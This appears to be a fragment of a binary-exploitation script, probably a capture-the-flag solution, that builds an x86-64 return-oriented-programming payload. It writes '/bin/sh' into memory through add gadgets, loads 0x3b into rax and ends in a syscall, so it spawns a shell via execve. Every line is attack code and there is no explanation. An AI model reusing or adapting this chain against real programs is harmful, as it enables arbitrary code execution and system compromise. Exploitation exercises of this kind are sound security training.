payload = p64(0x401e25)
#0x0000000000401e25: pop rbx; pop rbp; ret; 
payload += p64(0x80)+p64(0x4281e8)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x401e25)
# 0x0000000000401e25: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4280ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x401e25)
# 0x0000000000401e25: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4280b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x428070)+p64(0x401dc0)
# 0x0000000000401dc0: pop rsi; pop rbp; ret; 
payload += p64(0x36b27fc0)+p64(0x0)+p64(0x401ead)
# 0x0000000000401ead: mov eax, esi; add rsp, 8; pop rbx; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x401dc0)
# 0x0000000000401dc0: pop rsi; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x401ead)
# 0x0000000000401ead: mov eax, esi; add rsp, 8; pop rbx; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401dc0)
# 0x0000000000401dc0: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40cb68)
# 0x000000000040cb68: syscall; 
payload += b''
